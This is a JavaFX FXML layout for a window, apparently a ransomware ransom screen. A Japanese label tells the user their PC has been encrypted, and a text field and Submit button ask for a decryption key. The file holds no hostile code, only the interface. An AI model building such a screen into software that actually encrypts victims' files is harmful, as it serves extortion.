<?xml version="1.0" encoding="UTF-8"?>

<?import javafx.scene.control.*?>
<?import javafx.scene.layout.*?>

<AnchorPane xmlns="http://javafx.com/javafx/8"
            xmlns:fx="http://javafx.com/fxml/1"
            fx:controller="fxml.Crypted"
            prefHeight="200.0" prefWidth="800.0">
    <children>
        <Label text="あなたの PC は暗号化されました！あらまぁ _:(´ཀ`」 ∠):"
               layoutX="20"
               layoutY="30"/>

        <TextField fx:id="inputKey" onAction="#handleInputAction"
                   promptText="Please Input a key"
                   layoutX="20.0"
                   layoutY="80.0"
                   prefHeight="25.0"
                   prefWidth="180.0"/>
        <Button onAction="#handleInputAction"
                text="Submit"
                layoutX="205.0"
                layoutY="80.0"
                mnemonicParsing="false"
        />
    </children>
</AnchorPane>
